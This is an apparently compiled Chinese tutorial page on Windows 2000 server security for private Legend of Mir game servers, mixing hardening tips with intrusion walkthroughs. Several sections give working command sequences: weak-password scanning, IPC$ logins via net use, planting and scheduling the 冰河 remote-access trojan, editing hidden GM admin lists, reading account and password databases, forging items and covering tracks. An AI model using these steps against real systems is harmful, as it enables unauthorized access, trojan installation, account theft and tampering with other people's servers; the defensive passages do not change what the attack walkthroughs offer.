服務器安全配置精華技巧(2)_Windows教程

      編輯Tag賺U幣
      教程Tag:暫無Tag,歡迎添加,賺取U幣!

      6.鎖住注冊表

        在windows2000中,只有administrators和Backup Operators才有從網絡上訪問注冊表的權限。如果你覺得還不夠的話,可以進一步設定注冊表訪問權限,詳細信息請參考:

        http://support.microsoft.com/suppor...s/Q153/1/83.asp    

        7.關機時清除掉頁面文件

        頁面文件也就是調度文件,是win2000用來存儲沒有裝入內存的程序和數據文件部分的隱藏文件。一些第三方的程序可以把一些沒有的加密的密碼存在內存中,頁面文件中也可能含有另外一些敏感的資料。 要在關機的時候清楚頁面文件,可以編輯注冊表

        HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management

        把ClearPageFileAtShutdown的值設置成1。
       
        8.禁止從軟盤和CD Rom啟動系統

        一些第三方的工具能通過引導系統來繞過原有的安全機制。如果你的服務器對安全要求非常高,可以考慮使用可移動軟盤和光驅。把機箱鎖起來扔不失為一個好方法。    

        9.考慮使用智能卡來代替密碼

        對于密碼,總是使安全管理員進退兩難,容易受到 10phtcrack 等工具的攻擊,如果密碼太復雜,用戶把為了記住密碼,會把密碼到處亂寫。如果條件允許,用智能卡來代替復雜的密碼是一個很好的解決方法。    

        10.考慮使用IPSec

        正如其名字的含義,IPSec 提供 IP 數據包的安全性。IPSec 提供身份驗證、完整性和可選擇的機密性。發送方計算機在傳輸之前加密數據,而接收方計算機在收到數據之后解密數據。利用IPSec可以使得系統的安全性能大大增強。   

      SF的必須開放端口,極其解決端口安全的方法

        傳奇服務器開放端口+花生殼+一些必須端口

        可以將這些端口使用TCP/IP篩選,只開放這些端口增加安全性,(開設其他服務,端口自己再加入)

        TCP/IP篩選端口-> TCP斷口

        端口7220 .... RunGate 1 端口

        端口7210 .... RunGate 2 端口 同時開啟3個RunGate

        端口7200 .... RunGate 3 端口

        端口7100

        端口7012

        端口6000

        端口5600

        端口5500

        端口5100

        端口5000

        端口4900

        端口3389

        端口3372

        端口3100

        端口3000

        端口1027

        端口1025

        端口0135   

        \system32\drivers\etc\services 文件中有知名端口和服務的對照表可供參考。具體方法為:

        網上鄰居>屬性>本地連接>屬性>internet 協議(tcp/ip)>屬性>高級>選項>tcp/ip篩選>屬性 打開tcp/ip篩選,添加需要的tcp,協議即可。    

        我開了3個RunGate端口,解決多個玩家同時登陸訪問時會出現7200錯誤而使服務器突然狂卡,開3個效果比較好。是*(ggggg7原創)

        開3個RunGate端口的方法:

        RunGate文件夾再復制2份 分別為RunGate1,RunGate2,RunGate3 將里面的Mirgate.ini分別改為GatePort=7200,GatePort=7210,GatePort=7220    

        DBSrv200文件夾下的!serverinfo.txt改為127.0.0.1 127.0.0.1 7200 127.0.0.1 7210 127.0.0.1 7220  
       
        Mir200文件夾下的!servertable.txt改為

        1 127.0.0.1 7200

        2 127.0.0.1 7210

        3 127.0.0.1 7220

        

        然后運行RunGate1,RunGate2,RunGate3 下的3個RunGate.exe

        

        M2Server會提示:

        Gate 0 opened

        Gate 1 opened

        Gate 2 opened

        適當的加點防火墻會更好

      私服的攻與防

        本人崇尚私服技術!熱情鉆研私服!為營造一個好的游戲氛圍而共同努力過!

        前幾*,本私服也同樣遭受過黑客的攻擊!但是研究了幾次發現了漏洞的所在!

        下面我先寫如何入侵計算機的,我用的是windows 2000 SEVER

        1 X-SCAN掃描IP 看看誰是弱口令(IP也非常容易得到,私服都有,弱口令就是用戶名和密碼都是系統默認的,沒有改。)

        2 打開DOS系統 在DOS下進行*作!

        c:/>net use \\192.168.0.1\ipc$ /user:administrator 進入對方計算機USER進入的就是管理員用戶。

        進入了以后就好辦了,可以找你要黑的私服!做GM也好,搞破壞刪除也好,比如做GM吧!

        c:/>copy \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt 都是命令,可以看出來,其余的想怎么改就憑你了,但是我得解釋一下!!這段代碼目的很簡單就是將D盤拷貝一個傳奇GM的列表,你可以把你自己添加進去在編輯!

        c:\>edit \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt

        這樣就可以了。這是利用弱口令進入計算機的方法!!當然了還有更多的方法。

        我在講講我的 ** 傳奇的遭黑的經歷!

        首先,就是鼠標亂動,很明顯就是被人控制了,分析如下:1,中木馬,2遠程控制!

        其次,有文件覆蓋的對話框,計算機被突然重新啟動!!分析如下:1,破壞系統,2,對傳奇的控制!3,從新啟動是為了黑客的設置生效!

        再次,有非法GM制造物品,以被查出。分析如下:是針對傳奇而來!

        解決辦法:用殺毒軟件殺毒,最好在DOS下進行!2,是2000的漏洞太多,查找無用的端口,并關閉3389等,下載 2000 SP3 的補丁!在控制面板中選本地用戶和組中關閉GUEST帳號!和 IUSR (計算機名)INTNERNET來賓帳號關閉(我的傳奇就是黑客利用這個號進入計算機的),修改超級管理員用戶名與密碼! 在關閉遠程訪問等功能,另外,進攻傳奇主要是GM列表,我同樣也中過,現象是這樣的,打開AdminList.txt文件,沒有發現多的GM,利用CTRL-A看看有沒有多余的GM,另外仔細一看,在看AdminList.TXT的文件名后面有沒有空格,設置文件全部顯示,會發現是否多了一個隱藏GM列表文件,這也是屢進不止的發現有非法GM的原因.黑客進攻我的計算機是用了2個小時就被我發現了,立即做了相應的修改,恢復了傳奇的正常運行,至今為止,仍然有人進入我的來賓帳號的警告,但是已經進不來了!傳奇也步入了正常的運行當中!

        雖然我寫了一些如何進攻和防御計算機的方法和解決辦法,我自己也覺得有點自相矛盾的想法,但是我的目的很是簡單,希望能夠幫助你解決你的問題!提高自己計算機的安全
         


        如何在別人的私服做GM????
        攻擊初級教學

        我在侵入別人4f所使用的方法    

        看到有些4f做的不錯,但是進去又不是很有錢,也沒裝備,高手也很多,一直不喜歡在里面當菜鳥的我,一口氣進入他們的服務器端大鬧一番之后。當足了gm的癮,現在我把方法公布與大家。。。。
       
        其實我所使用的方法很簡單,只有4個工具:
       
        (一):shed.exe    

        (二)流光2000    

        (三)cmd.exe (其實就是2000下的dos啦)!
       
        (四)冰河8.4 操作系統:win2000 server 或者winxp系統。 “shed.exe”:其實就是用來網上查共享資源的,速度快,可以查到很多服務斷的共項文件,不過在這里面有些ip在瀏覽器中無法訪問,這是因為其中也包含了個人上網的ip.呵呵!一些作網站,網吧的服務器一些目錄都是共享的,有些是可以訪問,但是不能刪除,因為你所訪問的都是以匿名訪問的,所以權限不夠!有些需要密碼。遇到密碼怎辦?用流光! “流光”雖說對202作了限制,但是對小日本的ip可是沒有限制的,呵呵!所以說使用流光的ipc探測,建立一個空對話,查到用戶列表,然后先簡單探測,此時有些網管懶惰,把administrator設置的過于簡單,呵呵,你就可以抓到了。
       
        下一步如何做呢?也許在你查對方的端口時發現對方開的端口很少,比如ftp沒開,怎辦呢?冰河! “冰河”,想必許多朋友都玩過,使用冰河控制一臺服務器速度很快,(因為服務器那邊帶寬很大)幾分鐘就可以查到對方主機的主頁所在位置。但是如何上傳并且控制他呢? “cmd.exe” 是2000下的dos了,執行cmd.exe 使用net命令,    

        具體操作如下:  
        第一步:net use \\ip\ipc$ “password” /user:”user” 說明:以一個超級用戶名與你想黑的網站建立聯接,當然超級用戶必須是該網站admin里的。這里的”ip”就是主機了,“password”就是超級用戶的密碼,“user”就是超級用戶。比如:net use \\210.248.250.2\ipc$ “maozhiie” /user:maozhijie    

        第二步:copy g-server.exe \\ip\admin$\system32 說明:g-server.exe就是冰河的遠程服務器端。意義:將此文件拷貝到對方的主機winnt里的system32目錄里。也許有人要問木馬侵入對方那邊可以察覺出來的吧,呵呵!裝了防火墻估計可以,不過很多主機沒錢買呀!不像中國盜版滿天飛!如果你有最新的木馬也可以的!這是最好的了!!嘿嘿……    

        第三步:net time \\ip 察看對方的服務器時間。由于有時差,應該是一個小時吧!所以必須要以對方的服務器時間為準。    

        第四步:at \\ip time g-server.exe 這里的time就是對方的主機時間。作用:在規定時間執行該程序。比如 at \\210.248.250.2 19:55 g-server.exe 第五步:冰河就可以控制該電腦了。這個我就不說了吧,呵呵!菜鳥也會玩的軟件。    

        這時我們就可以控制服務器了,    

        net use * \\ip\*$ 遠程映射    

        看這個
         

        mir.db里面有每個人的數據,并且沒加密的,大家可以用

        access找開來改一下,改幾個極品,如0-80攻的木劍啊,0-50魔的六角戒指之類的,那就隨你的便了。只是這樣也太煩人了。呵呵。

        比如武器,數據格式如下(全部是16進制)

        ** ** ** ** ce 00 43 12 88 13 01 02 03 04 05 06 07 08 09 00 00 0a

        前面**的是物品代碼,然后0xce 00 是武器代碼(高位在后),和物品db數據庫中對應,

        例:物品數據庫中屠龍是序號(idx)是205,對應到這里就是(205+1)轉為16進制是ce

        后面的 43 12是當前持久度,88 13是最大持久度。

        例:43 12換算成十進制為17170,持久度為17

        后面的01 02 03依次是攻擊、魔法、道術。

        注意是在原武基礎上增加。

        例:上面的屠龍顯示出來是攻擊:5-36,道術:0-2,魔法:0-3。

        后面的04 05 06 07 08 09依次是武器的 幸運、詛咒、準確、攻擊速度、強度。

        后面兩個空位后緊跟的0x0a是表示武器是否被修煉,具體來說

        給武器加攻擊時:

        修煉前:00

        修煉后:0a

        試驗成功后:00,攻擊值增加。

        對于首飾和衣服,自己研究吧,這有好多人都知道的吧,我沒細寫。網上這方面的文章是有的,我就不用多說了吧?

        然后到, mirserver\mud2\logsrv\iddb下

        這里有個id.db所有人的帳號和密碼都在了,你看著辦吧,不過偷人家的號也不是什么光榮的事,我是從來不做的,只是常常會拿gm的號來reload一下。呵呵

        

        這里,我把你邊走邊看加到這個服務器的adminlist,呵呵,這里是打個比方,這里加入你的名字),然后,我們到mir.db中找出gm的帳號,再到id.db中找出這個帳號的密碼。好了,ok了,用gm號進入游戲(進之前m一下他啊,不要讓人家發現了,也不要改人家的密碼,讓人家發現了多不好啊,呵呵)。打命令@reloadadmin。立刻out吧。

        然后,把你加入adminlist的人物從adminlist里刪除,好了,你進去游戲吧,你是gm了,可是真正的gm是不會從服務器端看到你的名字呢!!他也許在想“這里怎么了啊?好像還有個gm???”。呵呵,不過不要過火了,不然人家一個reload你的權限就沒了啊。

        到這里大家做gm的夢就完成了,下面我說的就是怎么遠程控制服務器主機了,比如給他關機啊重啟啊····

      私服技術我是一點都不懂。不過服務器安全方面還是略懂一二哦!

        服務器入侵主要靠的是帳號與密碼。大家要先明白什么是系統帳號。什么是系統密碼!

        其它WINDOWS每一個系統都有著他的超級管理員帳號與密碼!

        一但這些被黑客掃描到的話,哪么你將會得到一個恐怕的威脅!

        當你私服是人氣高的時候。給黑客入侵的話,哪要是萬一給刪了數據。到時候。真的是慘不忍堵。

        一:了解一下帳號的含義

        先運行CMD

        然后輸入:net user(回車健)

        這樣后,會顯示一例帳號

        再查看管理員帳號

        輸入:net localgroup administrators

        這就是查看administrators組的用戶。這樣的話若是人家用隱藏帳號的方法也會查出來!

        系統自帶的超級管理員帳號是administrator

        記住這里顯示出來多個帳號不明的帳號。哪就證明你機器不安全了。若出現在的帳號都是你自已的帳號。哪百分之四十你機器未被入侵

        帳號安全:

        二:密碼篇

        你若覺得自已的帳號密碼是123456哪么不出三秒人家就到你機上一游了。

        修改密碼方法,在DOS下修改更安全

        輸入net user 帳號名 需修改密碼(然后回車健)

        一般密碼設復雜一點!  

        溢出:

        2000服務器版裝下去會自動裝IIS的,若你覺得IIS沒有什么用就停止。IIS地址:開始》》程序》》管理工具》》Internet信息服務(這個就是IIS)你將他開啟。上面按停止!這樣就進一步安全了。不過若IIS你需要用的話,哪么記得打目前最新的補丁SP4哦。    

        RPC溢出。大家記住,試試telnet IP 135看看有沒有開著。若是開著。請打RPC補丁。若找不到。干脆裝個防火墻,將135端屏蔽!
       
        大家千萬要記住。入侵系統最關點的就是要帳號密碼。保護好自已帳號與密碼。安全一定屬于你!

        本文引起廣大4f擁有者的注意

        入侵傳奇私服/充當非法GM。

        首先,我得聲明,我寫本文并不是教大家如何去黑4f,只是想以本文引起廣大4f擁有者的注意

        ,提高自己的網管水平。

        我愛玩游戲,但卻玩得很菜,也沒有時間去玩,只想玩著過癮,所以,當我開始玩傳奇時,

        雖覺得是好玩,但玩盛大的簡直是在受罪,升級慢,沒好裝備,處處受人欺負。所以,4f是明

        智的選擇,但進去時也沒有好裝備,也是受人欺負,難道我不可以做gm?試試,folling me!

        找來一大堆4f的ip,開個x-scan掃吧。有了,還真不少,都是弱口令的,這些網管真菜呀。

        選好一個,192.168.0.1,go!

      打開cmd,

        1)c:/>net use 192.168.0.1ipc$ /user:administrator

        連接成功,

        ok,連上了,成功在望,

        2)c:/>copy 192.168.0.1d$mirservermir200enviradminlist.txt

        系統找不到指定的文件。

        沒有?不可能吧?唔,一定是隱藏了,沒關系,再來,

        3)c:>attrib -r -h 192.168.0.1d$mirservermir200enviradminlist.txt

        沒有提示,成功了,

        這次連復制也不用了,直接改吧,

        4)c:>edit 192.168.0.1d$mirservermir200enviradminlist.txt

        會打開個介面,看看里面有哪些gm,加個吧,自己記得就行了,改完保存退出

        5)c:>attrib +r +h 192.168.0.1d$mirservermir200enviradminlist.txt

        把adminilist.txt還原成只讀隱藏,

        好了,大功告成,快打掃腳印吧,別讓人發現被入侵了,

        現在,就等著系統重啟了,等不及的話就在第五步讓它重啟,不過這樣太危險了,還是等吧

        ,

        第二天注冊個帳號,新建個之前加的人名進去,

        /who

        當前150人在線

        哈,我就是gm了。趕快把自己升級,

        @level -1

        升級成功,255級,哈哈

        再造出想要的裝備,想要什么盡情造吧,

        重復上面的把自己從adminlist.txt里刪了,哈哈,好裝備到手了,可以玩了

        

        面記得有位朋友對加強對服務器安全性的解決方法進行了一系列的說明,講得非常詳細,但是我覺得還有很多需要補充的地方.微軟的系統是漏洞和補丁著稱,真正要對服務器的安全配置確實非常困難,考慮的方面也太多了.

        今天先講一個方面的內容了,也算是對前面的朋友的進一步補充吧!

        前面那位朋友所概述的主要是針對WIN2000系統弱口令的安全設置!他已經說得很仔細了,做到那些,口令這一關差不多了.確實在互聯網的時代,口令真的非常重要.我對國外的主機進行了一系列的測試,就拿有弱口令的系統來說,還有不少!其中也包括了不少中小型企業的Web服務器,E-MAIL,PROXY服務器都有這種低級的錯誤!

        如果說你在這方面做得非常的仔細.但你至少還要仔細研究一下你主機現在所運行的有哪些服務,這些服務代表著什么?你應該很清楚!因為現在黑客軟件,木馬工具,遠程控制軟件大多是以一種服務的形式運行在你的服務器系統里,一般的防火墻,殺毒軟件對其并沒有任何反映的.對于服務形式出現的控制工具.比較難得發現,所以你就必須在服務器里運行的哪些服務非常熟悉.對于陌生或奇怪的服務應該安全設置好.

        下面我都WIN2000的WWW(IIS)服務器安全配置略講一下,WWW服務在WIN2000SERVER,ADSERVER,DATACENTERSERVER,版本中是默認安裝的,如果你不需要用2000的WWW服務的話,建議不要安裝.至于添加/刪除你可以控制面板的去掉他的安裝,或者在管理工具/服務里設置WORD WIDE WEB SERVICE啟動類型為手動/禁用

        這樣的話系統就不默認啟動改服務!

        如果你需要用IIS來建站宣傳一下自己的私服,你就必須按以下方法安全配置好IIS,

        在IIS組件你首先要去掉你不需要的SMTP,SNNP,FTP,這樣的話你可以降低你服務器運行所占用的CPU資源,和內存使用率.然后建議你刪除你C:\INTERPUB\目錄下的所有內容!或者更改路徑.在IIS管理器中刪除默認站點,(或者刪除SCRIPTS這個虛擬目錄)因為這個目錄有可寫的權限的.在新建的WEB站點中,設置IIS的權置,必須讓它不能寫入,或運行.因為IIS是默認支持ASP腳本的.然后在IIS中刪除不需要的映射,這個很重要.如果你要支持PHP,CGI腳本的話,你還得配置好PHP.CGI的應用程序的正確映射,禁用或刪除FSO組件,(去年深圳之窗就是被人家利用FSO黑了......)如果你要使用FSO的話,最好要改名!否則的話,你給別人提供主頁上傳的話,你肯定是會被黑的.小心呀!

        目前在黑客橫行的互聯網空間中,利用IIS的漏洞,提申自己的權限,而成為AD,這些只是輕而易舉的事情,這不需要花幾天的時間去暴力破解一下口令,像自己架設的Web服務器有種情況,更是數不甚數了.關于怎利用UNICODE漏洞去提供AD權限的文章,網上太多了,我就不多講了.

        這些來說應該是服務器安全防范方面的一個例子而已,真正要做到服務器的安全運行,需要你花大量的時間去摸索.因為這些來說,足以應付一些無聊的.....當然了,你如果需要Web服務器,我還是建議你去使用AP了.他的源代碼開發,免費,安全性穩定性都比IIS強得多了.

      來源:網絡搜集//所屬分類:Windows教程/更新時間:2013-04-15
      相關Windows教程